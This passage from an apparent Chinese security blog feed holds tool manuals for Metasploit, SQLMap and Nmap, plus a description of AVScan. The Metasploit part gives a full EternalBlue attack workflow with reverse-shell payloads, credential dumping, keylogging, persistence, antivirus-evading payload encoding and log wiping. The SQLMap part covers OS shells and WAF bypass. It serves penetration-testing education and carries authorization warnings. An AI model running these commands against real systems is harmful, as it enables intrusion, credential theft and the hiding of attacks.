align="left">目标主动连接攻击者</td><td align="left"><code>windows/meterpreter/reverse_tcp</code></td></tr><tr><td align="left"><strong>绑定Shell</strong></td><td align="left">攻击者连接目标监听端口</td><td align="left"><code>windows/shell_bind_tcp</code></td></tr><tr><td align="left"><strong>无文件载荷</strong></td><td align="left">完全内存驻留</td><td align="left"><code>windows/x64/meterpreter_reverse_https</code></td></tr><tr><td align="left"><strong>跨平台载荷</strong></td><td align="left">支持多系统</td><td align="left"><code>java/meterpreter/reverse_tcp</code></td></tr></tbody></table><p><strong>C. Auxiliary 模块（辅助工具）</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># 端口扫描</span><br><span class="line">use auxiliary/scanner/portscan/tcp</span><br><span class="line">set PORTS 1-1000</span><br><span class="line">set RHOSTS 192.168.1.0/24</span><br><span class="line"></span><br><span class="line"># 漏洞验证</span><br><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br><span class="line"></span><br><span class="line"># 密码爆破</span><br><span class="line">use auxiliary/scanner/ssh/ssh_login</span><br><span class="line">set USER_FILE /path/users.txt</span><br><span class="line">set PASS_FILE /path/passwords.txt</span><br></pre></td></tr></table></figure><hr><h4 id="4-完整渗透工作流（以-EternalBlue-为例）"><a href="#4-完整渗透工作流（以-EternalBlue-为例）" class="headerlink" title="4. 完整渗透工作流（以 EternalBlue 为例）"></a><strong>4. 完整渗透工作流（以 EternalBlue 为例）</strong></h4><p><strong>Step 1：信息收集</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">db_nmap -sV -O 192.168.1.100  # 扫描结果存入数据库</span><br><span class="line">services -p 445 -R             # 列出所有开放445端口的主机</span><br></pre></td></tr></table></figure><p><strong>Step 2：漏洞利用</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">set RHOSTS 192.168.1.100</span><br><span class="line">set LHOST eth0</span><br><span class="line">set PAYLOAD windows/x64/meterpreter/reverse_tcp</span><br><span class="line">exploit -j  # 后台执行</span><br></pre></td></tr></table></figure><p><strong>Step 3：后渗透操作</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"># 基础信息收集</span><br><span class="line">sysinfo</span><br><span class="line">run post/windows/gather/enum_logged_on_users</span><br><span class="line"></span><br><span class="line"># 权限提升</span><br><span class="line">getsystem  # 尝试提权</span><br><span class="line">run post/multi/recon/local_exploit_suggester</span><br><span class="line"></span><br><span class="line"># 密码提取</span><br><span class="line">load kiwi</span><br><span class="line">creds_all</span><br><span class="line"></span><br><span class="line"># 持久化</span><br><span class="line">run persistence -X -i 60 -p 443 -r 192.168.1.50</span><br><span class="line"></span><br><span class="line"># 横向移动</span><br><span class="line">run post/windows/manage/migrate</span><br><span class="line">run post/multi/manage/autoroute</span><br></pre></td></tr></table></figure><p><strong>Step 4：痕迹清理</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">clearev  # 清除日志</span><br><span class="line">timestomp -b C:\\target.exe  # 恢复文件时间戳</span><br></pre></td></tr></table></figure><hr><h4 id="5-Meterpreter-高级命令手册"><a href="#5-Meterpreter-高级命令手册" class="headerlink" title="5. Meterpreter 高级命令手册"></a><strong>5. Meterpreter 高级命令手册</strong></h4><table><thead><tr><th align="left"><strong>类别</strong></th><th align="left"><strong>命令</strong></th><th align="left"><strong>功能</strong></th></tr></thead><tbody><tr><td align="left"><strong>文件系统</strong></td><td align="left"><code>download /path/file</code></td><td align="left">下载文件</td></tr><tr><td align="left"></td><td align="left"><code>upload /local/file C:\\target</code></td><td align="left">上传文件</td></tr><tr><td align="left"></td><td align="left"><code>edit file.txt</code></td><td align="left">编辑文件</td></tr><tr><td align="left"><strong>系统操作</strong></td><td align="left"><code>screenshot</code></td><td align="left">截屏</td></tr><tr><td align="left"></td><td align="left"><code>webcam_snap</code></td><td align="left">摄像头拍照</td></tr><tr><td align="left"></td><td align="left"><code>keyscan_start</code></td><td align="left">键盘记录</td></tr><tr><td align="left"><strong>网络操作</strong></td><td align="left"><code>portfwd add -l 3389 -p 3389 -r TARGET_IP</code></td><td align="left">端口转发</td></tr><tr><td align="left"></td><td align="left"><code>arp</code></td><td align="left">查看ARP表</td></tr><tr><td align="left"><strong>权限管理</strong></td><td align="left"><code>getsystem</code></td><td align="left">提权至SYSTEM</td></tr><tr><td align="left"></td><td align="left"><code>run post/windows/gather/hashdump</code></td><td align="left">导出密码哈希</td></tr><tr><td align="left"><strong>防御规避</strong></td><td align="left"><code>migrate &lt;PID&gt;</code></td><td align="left">迁移进程（推荐迁移到explorer.exe）</td></tr><tr><td align="left"></td><td align="left"><code>load powershell</code></td><td align="left">加载PowerShell扩展</td></tr></tbody></table><hr><h4 id="6-高级技巧与最佳实践"><a href="#6-高级技巧与最佳实践" class="headerlink" title="6. 高级技巧与最佳实践"></a><strong>6. 高级技巧与最佳实践</strong></h4><p><strong>A. 载荷免杀处理</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=443 \</span><br><span class="line">-e x86/shikata_ga_nai -i 5 \</span><br><span class="line">-f exe -o payload.exe \</span><br><span class="line">--encoder-options key=mysecretpassword</span><br></pre></td></tr></table></figure><p><strong>B. 资源脚本自动化</strong><br>创建 <code>autopwn.rc</code>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># 自动化攻击脚本</span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">set RHOSTS 192.168.1.100</span><br><span class="line">set PAYLOAD windows/x64/meterpreter/reverse_tcp</span><br><span class="line">set LHOST 192.168.1.50</span><br><span class="line">set ExitOnSession false</span><br><span class="line">exploit -j -z</span><br><span class="line"></span><br><span class="line"># 后渗透自动化</span><br><span class="line">use post/windows/manage/migrate</span><br><span class="line">set SESSION -1</span><br><span class="line">run</span><br></pre></td></tr></table></figure><p>执行：<code>msfconsole -r autopwn.rc</code></p><p><strong>C. 横向移动技术</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"># 添加路由</span><br><span class="line">run post/multi/manage/autoroute SUBNET=192.168.2.0/24</span><br><span class="line"></span><br><span class="line"># SMB登录爆破</span><br><span class="line">use auxiliary/scanner/smb/smb_login</span><br><span class="line">set RHOSTS 192.168.2.1-254</span><br><span class="line">set SMBDOMAIN MYDOMAIN</span><br><span class="line">set USER_FILE users.txt</span><br><span class="line">set PASS_FILE passwords.txt</span><br><span class="line">run</span><br><span class="line"></span><br><span class="line"># Pass-the-Hash攻击</span><br><span class="line">use exploit/windows/smb/psexec</span><br><span class="line">set RHOST 192.168.2.50</span><br><span class="line">set SMBUser Administrator</span><br><span class="line">set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span><br></pre></td></tr></table></figure><hr><h4 id="7-防御规避与隐蔽技术"><a href="#7-防御规避与隐蔽技术" class="headerlink" title="7. 防御规避与隐蔽技术"></a><strong>7. 防御规避与隐蔽技术</strong></h4><ul><li><p><strong>流量加密</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set EnableStageEncoding true</span><br><span class="line">set StageEncoder x86/fnstenv_mov</span><br><span class="line">set StagerVerifySSLCert true</span><br></pre></td></tr></table></figure></li><li><p><strong>反沙箱检测</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/gather/checkvm  # 检测虚拟机</span><br><span class="line">run post/windows/manage/smart_migrate  # 智能进程迁移</span><br></pre></td></tr></table></figure></li><li><p><strong>时间规避</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set SLEEP 10  # 延迟10秒</span><br><span class="line">set TIMEOUT 60 # 超时60秒</span><br></pre></td></tr></table></figure></li><li><p><strong>日志清理</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run event_manager -c  # 清除事件日志</span><br><span class="line">clearev  # 清除安全/系统/应用日志</span><br></pre></td></tr></table></figure></li></ul><hr><h4 id="8-专业维护与更新"><a href="#8-专业维护与更新" class="headerlink" title="8. 专业维护与更新"></a><strong>8. 专业维护与更新</strong></h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 每日更新</span><br><span class="line">msfupdate  # 框架更新</span><br><span class="line">apt update &amp;&amp; apt upgrade  # Kali系统更新</span><br><span class="line"></span><br><span class="line"># 模块管理</span><br><span class="line">reload_all  # 重载所有模块</span><br><span class="line">search -u   # 检查模块更新</span><br><span class="line"></span><br><span class="line"># 数据库维护</span><br><span class="line">db_export -f xml /path/backup.xml  # 备份数据</span><br><span class="line">db_rebuild_cache  # 重建缓存</span><br></pre></td></tr></table></figure><hr><h4 id="9-安全与合规指南"><a href="#9-安全与合规指南" class="headerlink" title="9. 安全与合规指南"></a><strong>9. 安全与合规指南</strong></h4><ol><li><strong>法律授权</strong>：必须持有书面渗透测试授权书</li><li><strong>范围限定</strong>：明确测试边界（IP&#x2F;域名&#x2F;时间窗）</li><li><strong>数据保护</strong>：加密存储敏感数据，测试后立即删除</li><li><strong>规避风险</strong>：<ul><li>避免使用 <code>-j -z</code> 参数在生产环境自动化攻击</li><li>禁用 <code>exploit/windows/smb/psexec</code> 在高负载系统</li></ul></li><li><strong>报告要求</strong>：<ul><li>记录所有执行的命令（<code>spool /path/log.txt</code>）</li><li>截图关键证据（<code>screenshot</code>）</li><li>提供漏洞修复建议</li></ul></li></ol></li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;ul&gt;
&lt;li&gt;&lt;h3 id=&quot;Metasploit-详细使用手册&quot;&gt;&lt;a href=&quot;#Metasploit-详细使用手册&quot; class=&quot;headerlink&quot; title=&quot;Metasploit 详细使用手册&quot;&gt;&lt;/a&gt;Metasploit 详细使用手册&lt;/h3&gt;&lt;p&gt;&lt;</summary>
      
    
    
    
    <category term="工具" scheme="http://example.com/categories/%E5%B7%A5%E5%85%B7/"/>
    
    
    <category term="安全工具" scheme="http://example.com/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/"/>
    
  </entry>
  
  <entry>
    <title>SQLMap简易手册</title>
    <link href="http://example.com/2025/01/06/SQLMap%E7%AE%80%E6%98%93%E6%89%8B%E5%86%8C/"/>
    <id>http://example.com/2025/01/06/SQLMap%E7%AE%80%E6%98%93%E6%89%8B%E5%86%8C/</id>
    <published>2025-01-05T16:00:00.000Z</published>
    <updated>2025-06-21T18:09:08.944Z</updated>
    
    <content type="html"><![CDATA[<h3 id="SQLMap-简易手册"><a href="#SQLMap-简易手册" class="headerlink" title="SQLMap 简易手册"></a>SQLMap 简易手册</h3><p><strong>自动化 SQL 注入检测与利用工具</strong><br>🔗 <strong>官方网站</strong>：<a href="https://sqlmap.org/">https://sqlmap.org</a><br>🔗 <strong>GitHub 仓库</strong>：<a href="https://github.com/sqlmapproject/sqlmap">https://github.com/sqlmapproject/sqlmap</a></p><hr><h4 id="1-SQLMap-简介"><a href="#1-SQLMap-简介" class="headerlink" title="1. SQLMap 简介"></a><strong>1. SQLMap 简介</strong></h4><p>SQLMap 是一款开源的自动化 <strong>SQL 注入检测与利用工具</strong>，支持：<br>✅ <strong>数据库指纹识别</strong>（MySQL、Oracle、SQL Server 等）<br>✅ <strong>数据提取</strong>（表&#x2F;列&#x2F;数据拖取）<br>✅ <strong>文件系统访问</strong>（读&#x2F;写文件）<br>✅ <strong>操作系统命令执行</strong>（提权操作）<br>✅ <strong>绕过 WAF&#x2F;IDS</strong>（智能 tamper 脚本）</p><blockquote><p>⚠️ 仅用于授权测试，非法使用将承担法律责任！</p></blockquote><hr><h4 id="2-安装方法"><a href="#2-安装方法" class="headerlink" title="2. 安装方法"></a><strong>2. 安装方法</strong></h4><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># Kali Linux（预装）</span><br><span class="line">sqlmap -h</span><br><span class="line"></span><br><span class="line"># 其他系统</span><br><span class="line">git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git</span><br><span class="line">cd sqlmap</span><br><span class="line">python sqlmap.py -h</span><br></pre></td></tr></table></figure><hr><h4 id="3-核心参数速查表"><a href="#3-核心参数速查表" class="headerlink" title="3. 核心参数速查表"></a><strong>3. 核心参数速查表</strong></h4><table><thead><tr><th align="left"><strong>功能</strong></th><th align="left"><strong>命令示例</strong></th><th align="left"><strong>说明</strong></th></tr></thead><tbody><tr><td align="left"><strong>基本检测</strong></td><td align="left"><code>sqlmap -u &quot;http://site.com?id=1&quot;</code></td><td align="left">自动检测注入点</td></tr><tr><td align="left"><strong>指定参数</strong></td><td align="left"><code>sqlmap -u &quot;http://site.com&quot; --data=&quot;id=1&quot;</code></td><td align="left">POST 请求检测</td></tr><tr><td align="left"><strong>数据库识别</strong></td><td align="left"><code>sqlmap -u &lt;URL&gt; --dbms=mysql</code></td><td align="left">指定数据库类型</td></tr><tr><td align="left"><strong>获取所有库</strong></td><td align="left"><code>sqlmap -u &lt;URL&gt; --dbs</code></td><td align="left">列出数据库名</td></tr><tr><td align="left"><strong>获取表名</strong></td><td align="left"><code>sqlmap -u &lt;URL&gt; -D dbname --tables</code></td><td align="left">拖取指定库的表</td></tr><tr><td align="left"><strong>提取数据</strong></td><td align="left"><code>sqlmap -u &lt;URL&gt; -D dbname -T users --dump</code></td><td align="left">导出表中数据</td></tr><tr><td align="left"><strong>执行 OS 命令</strong></td><td align="left"><code>sqlmap -u &lt;URL&gt; --os-shell</code></td><td align="left">获取系统 Shell（需权限）</td></tr><tr><td align="left"><strong>绕过 WAF</strong></td><td align="left"><code>sqlmap -u &lt;URL&gt; --tamper=space2comment</code></td><td align="left">使用 tamper 脚本绕过防护</td></tr></tbody></table><hr><h4 id="4-高级实战技巧"><a href="#4-高级实战技巧" class="headerlink" title="4. 高级实战技巧"></a><strong>4. 高级实战技巧</strong></h4><ul><li><p><strong>Cookie 注入检测</strong>：</p><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://site.com&quot; --cookie=&quot;id=1*&quot; --level 2</span><br></pre></td></tr></table></figure></li><li><p><strong>HTTP 头注入检测</strong>（如 User-Agent）：</p><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &lt;URL&gt; --random-agent --level 3</span><br></pre></td></tr></table></figure></li><li><p><strong>从 Burp 日志导入</strong>：</p><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r request.txt</span><br></pre></td></tr></table></figure></li><li><p><strong>导出数据到 CSV</strong>：</p><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &lt;URL&gt; --dump-format=CSV</span><br></pre></td></tr></table></figure></li></ul><hr><h4 id="5-常用-Tamper-脚本"><a href="#5-常用-Tamper-脚本" class="headerlink" title="5. 常用 Tamper 脚本"></a><strong>5. 常用 Tamper 脚本</strong></h4><p>用于绕过安全设备：</p><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">--tamper=space2dash     # 空格替换为 --</span><br><span class="line">--tamper=base64encode   # 参数 Base64 编码</span><br><span class="line">--tamper=chardoubleencode  # 双重 URL 编码</span><br></pre></td></tr></table></figure><blockquote><p>查看所有脚本：<code>sqlmap --list-tampers</code></p></blockquote><hr><h4 id="6-注意事项"><a href="#6-注意事项" class="headerlink" title="6. 注意事项"></a><strong>6. 注意事项</strong></h4><ul><li>⚠️ <strong>法律合规</strong>：必须有目标系统的书面授权。</li><li>⚠️ <strong>风险控制</strong>：避免使用 <code>--os-shell</code> 或 <code>--file-write</code> 等危险参数。</li><li>⚠️ <strong>隐蔽扫描</strong>：添加 <code>--delay=2</code> 降低请求频率，避免触发告警。</li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;h3 id=&quot;SQLMap-简易手册&quot;&gt;&lt;a href=&quot;#SQLMap-简易手册&quot; class=&quot;headerlink&quot; title=&quot;SQLMap 简易手册&quot;&gt;&lt;/a&gt;SQLMap 简易手册&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;自动化 SQL 注入检测与利用工具&lt;/strong&gt;</summary>
      
    
    
    
    <category term="工具" scheme="http://example.com/categories/%E5%B7%A5%E5%85%B7/"/>
    
    
    <category term="安全工具" scheme="http://example.com/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/"/>
    
  </entry>
  
  <entry>
    <title>nmap使用手册</title>
    <link href="http://example.com/2025/01/05/nmap%E4%BD%BF%E7%94%A8%E6%89%8B%E5%86%8C/"/>
    <id>http://example.com/2025/01/05/nmap%E4%BD%BF%E7%94%A8%E6%89%8B%E5%86%8C/</id>
    <published>2025-01-04T16:00:00.000Z</published>
    <updated>2025-06-21T18:08:59.575Z</updated>
    
    <content type="html"><![CDATA[<h3 id="Nmap-使用手册"><a href="#Nmap-使用手册" class="headerlink" title="Nmap 使用手册"></a>Nmap 使用手册</h3><p><strong>网络安全扫描利器</strong></p><hr><h4 id="1-什么是-Nmap？"><a href="#1-什么是-Nmap？" class="headerlink" title="1. 什么是 Nmap？"></a><strong>1. 什么是 Nmap？</strong></h4><p>Nmap（Network Mapper）是一款开源的网络探测和安全审计工具，用于：<br>✅ <strong>主机发现</strong>（哪些设备在线）<br>✅ <strong>端口扫描</strong>（哪些端口开放）<br>✅ <strong>服务识别</strong>（运行的服务及版本）<br>✅ <strong>操作系统检测</strong>（目标设备 OS 类型）<br>✅ <strong>漏洞扫描</strong>（结合脚本引擎 NSE）<br>广泛应用于渗透测试、网络管理和安全监控。</p><hr><h4 id="2-安装-Nmap"><a href="#2-安装-Nmap" class="headerlink" title="2. 安装 Nmap"></a><strong>2. 安装 Nmap</strong></h4><ul><li><p><strong>Linux</strong>：</p><p>bash</p><p>复制</p><p>下载</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install nmap  # Debian/Ubuntu</span><br><span class="line">sudo yum install nmap  # CentOS/RHEL</span><br></pre></td></tr></table></figure></li><li><p><strong>Windows&#x2F;macOS</strong>：<br>下载安装包 → <a href="https://nmap.org/download.html">官方下载页面</a></p></li></ul><hr><h4 id="3-基础命令与示例"><a href="#3-基础命令与示例" class="headerlink" title="3. 基础命令与示例"></a><strong>3. 基础命令与示例</strong></h4><table><thead><tr><th align="left"><strong>功能</strong></th><th align="left"><strong>命令示例</strong></th><th align="left"><strong>说明</strong></th></tr></thead><tbody><tr><td align="left"><strong>扫描单个主机</strong></td><td align="left"><code>nmap 192.168.1.1</code></td><td align="left">默认扫描 1000 个常用端口</td></tr><tr><td align="left"><strong>扫描多个主机</strong></td><td align="left"><code>nmap 192.168.1.1,2,3</code></td><td align="left">逗号分隔 IP 或范围 <code>1-100</code></td></tr><tr><td align="left"><strong>快速扫描</strong></td><td align="left"><code>nmap -F 192.168.1.1</code></td><td align="left">仅扫描 100 个常见端口</td></tr><tr><td align="left"><strong>全面扫描</strong></td><td align="left"><code>nmap -p- 192.168.1.1</code></td><td align="left">扫描<strong>所有 65535 个端口</strong></td></tr><tr><td align="left"><strong>服务版本检测</strong></td><td align="left"><code>nmap -sV 192.168.1.1</code></td><td align="left">识别服务及版本信息</td></tr><tr><td align="left"><strong>操作系统识别</strong></td><td align="left"><code>nmap -O 192.168.1.1</code></td><td align="left">推测目标操作系统</td></tr><tr><td align="left"><strong>脚本引擎扫描</strong></td><td align="left"><code>nmap --script=vuln 192.168.1.1</code></td><td align="left">使用 NSE 脚本检测漏洞</td></tr></tbody></table><hr><ul><li><h4 id="4-高级技巧"><a href="#4-高级技巧" class="headerlink" title="4. 高级技巧"></a><strong>4. 高级技巧</strong></h4><ul><li><p><strong>绕过防火墙</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -T4 192.168.1.1  # 半开放扫描（SYN 扫描）</span><br><span class="line">nmap -f 192.168.1.1        # 分片数据包绕过检测</span><br></pre></td></tr></table></figure></li><li><p><strong>输出结果保存</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap -oN result.txt 192.168.1.1  # 文本格式</span><br><span class="line">nmap -oX result.xml 192.168.1.1  # XML 格式</span><br></pre></td></tr></table></figure></li><li><p><strong>扫描整个子网</strong>：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 192.168.1.0/24          # CIDR 格式</span><br></pre></td></tr></table></figure></li></ul></li></ul><hr><h4 id="5-常用-NSE-脚本类别"><a href="#5-常用-NSE-脚本类别" class="headerlink" title="5. 常用 NSE 脚本类别"></a><strong>5. 常用 NSE 脚本类别</strong></h4><p>Nmap 脚本引擎（NSE）提供 600+ 脚本：</p><ul><li><code>auth</code>：身份验证检测</li><li><code>brute</code>：暴力破解测试</li><li><code>vuln</code>：已知漏洞扫描</li><li><code>safe</code>：非侵入式安全检查</li></ul><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --script=http-title 192.168.1.1  # 获取网站标题</span><br></pre></td></tr></table></figure><hr><h4 id="6-注意事项"><a href="#6-注意事项" class="headerlink" title="6. 注意事项"></a><strong>6. 注意事项</strong></h4><ul><li>⚠️ <strong>合法使用</strong>：仅在授权目标上扫描，避免触犯法律。</li><li>⚠️ <strong>网络影响</strong>：高强度扫描可能导致目标设备负载升高。</li><li>⚠️ <strong>隐蔽模式</strong>：使用 <code>-T</code> 调整时序（<code>-T0</code> 最慢，<code>-T5</code> 最快）。</li></ul><hr><h4 id="7-官方资源"><a href="#7-官方资源" class="headerlink" title="7. 官方资源"></a><strong>7. 官方资源</strong></h4><p>🔗 <strong>官网</strong>：<a href="https://nmap.org/">https://nmap.org</a></p><ul><li>下载安装包</li><li>完整文档与图书《Nmap Network Scanning》</li><li>脚本数据库与社区支持</li></ul><hr><blockquote><p><strong>提示</strong>：使用 <code>man nmap</code> 或 <code>nmap --help</code> 查看完整帮助。通过实践逐步掌握复杂功能！</p></blockquote>]]></content>
    
    
      
      
    <summary type="html">&lt;h3 id=&quot;Nmap-使用手册&quot;&gt;&lt;a href=&quot;#Nmap-使用手册&quot; class=&quot;headerlink&quot; title=&quot;Nmap 使用手册&quot;&gt;&lt;/a&gt;Nmap 使用手册&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;网络安全扫描利器&lt;/strong&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h4 id=</summary>
      
    
    
    
    <category term="工具" scheme="http://example.com/categories/%E5%B7%A5%E5%85%B7/"/>
    
    
    <category term="安全工具" scheme="http://example.com/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/"/>
    
  </entry>
  
  <entry>
    <title>AVScan</title>
    <link href="http://example.com/2024/12/29/AVScan/"/>
    <id>http://example.com/2024/12/29/AVScan/</id>
    <published>2024-12-28T16:00:00.000Z</published>
    <updated>2025-02-09T14:02:25.570Z</updated>
    
    <content type="html"><![CDATA[<h3 id="AVScan-杀毒软件识别工具"><a href="#AVScan-杀毒软件识别工具" class="headerlink" title="AVScan: 杀毒软件识别工具"></a>AVScan: 杀毒软件识别工具</h3><h4 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h4><p>在当今复杂多变的网络安全环境中，确保系统的安全性变得至关重要。为了帮助用户更好地管理和了解系统中安装的安全软件，<strong>AVScan</strong> 应运而生。作为一个基于 Web 的在线服务，AVScan 专注于识别 Windows 系统内的杀毒软件和其他安全防护程序。通过上传 <code>tasklist /SVC</code> 命令的输出，用户可以快速获取系统中所有正在运行的安全服务的信息，并确认它们是否为已知的合法杀毒软件。</p><h4 id="功能特性"><a href="#功能特性" class="headerlink" title="功能特性"></a>功能特性</h4><p><img src="/2024/12/29/AVScan/1248631664.png" alt="m59e2cn3.png"><br>AVScan 提供了一系列强大的功能，旨在简化用户对系统安全状态的理解和管理：</p><ul><li><strong>简单易用的界面</strong>：无需复杂的配置或安装，只需访问网站并提交 <code>tasklist /SVC</code> 输出即可开始扫描。</li><li><strong>即时在线分析</strong>：快速处理上传的数据，几乎立即返回分析结果，帮助用户及时采取行动。</li><li><strong>详细的报告生成</strong>：每次扫描后，AVScan 会生成一份详尽的报告，列出所有识别出的服务及其详细信息，包括名称、版本和服务描述等。</li><li><strong>实时更新的数据库</strong>：AVScan 定期更新其内部的杀毒软件和服务数据库，确保能够识别最新的安全产品。</li><li><strong>隐私保护</strong>：尊重用户的隐私，上传的数据不会被保存或用于其他目的，除非用户明确同意。</li><li><strong>支持多种语言</strong>：为了方便全球用户，AVScan 支持多种语言界面，使不同地区的用户都能轻松使用。</li></ul><h4 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h4><ol><li><strong>收集数据</strong>：<ul><li>打开命令提示符（以管理员身份运行）。</li><li>输入 <code>tasklist /SVC</code> 并按回车键执行命令。</li><li>将产生的输出内容复制到剪贴板。</li></ul></li><li><strong>提交分析</strong>：<ul><li>访问 <a href="https://github.com/secsi1/AVScan">AVScan官方网站</a> 或您部署的本地实例。</li><li>在提供的表单中粘贴之前复制的 <code>tasklist /SVC</code> 输出。</li><li>点击“扫描”或类似的按钮提交信息进行分析。</li></ul></li><li><strong>查看结果</strong>：<ul><li>等待几分钟让 AVScan 分析并处理数据。</li><li>浏览生成的报告，该报告将列出所有识别出的服务以及它们的安全状态。</li><li>对于任何未识别或可疑的服务，建议进一步调查或查阅官方文档。</li></ul></li></ol><h4 id="技术原理"><a href="#技术原理" class="headerlink" title="技术原理"></a>技术原理</h4><p>AVScan 的工作原理基于一个不断更新的杀毒软件和服务数据库。当用户上传 <code>tasklist /SVC</code> 的输出时，AVScan 会解析这些信息并与数据库中的条目进行匹配。如果找到匹配项，则表示该服务是已知的合法杀毒软件；如果没有找到匹配项，则可能需要用户进一步验证该服务的合法性。此外，AVScan 还会检查服务的版本号和签名信息，以确保其最新性和可靠性。</p><h4 id="开源与贡献"><a href="#开源与贡献" class="headerlink" title="开源与贡献"></a>开源与贡献</h4><p>作为一个开源项目，AVScan 的所有代码都公开托管在 <a href="https://github.com/secsi1/AVScan">GitHub</a> 上。这意味着任何人都可以查看、学习、修改和贡献代码。社区的支持对于项目的持续发展至关重要，因此我们鼓励所有感兴趣的朋友加入进来，共同提升 AVScan 的功能和性能。</p>]]></content>
    
    
      
      
